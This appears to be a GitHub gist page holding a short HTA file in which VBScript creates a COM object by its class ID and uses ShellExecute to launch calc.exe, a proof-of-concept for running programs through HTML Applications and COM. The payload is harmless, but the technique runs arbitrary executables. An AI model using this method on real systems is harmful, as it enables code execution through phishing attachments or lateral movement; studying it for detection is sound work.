Skip to content

Instantly share code, notes, and snippets.

@OlivierLaflamme
Created February 8, 2022 16:29
Show Gist options
  • Save OlivierLaflamme/4924a11ec33b9fbfb22830233205c2dc to your computer and use it in GitHub Desktop.
Save OlivierLaflamme/4924a11ec33b9fbfb22830233205c2dc to your computer and use it in GitHub Desktop.
com.hta
<script language="VBScript">
Set obj = GetObject("new:C08AFD90-F2A1-11D1-8455-00A0C91F3880")
obj.Document.Application.ShellExecute "calc.exe",Null,"C:\Windows\System32",Null,0
self.close
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment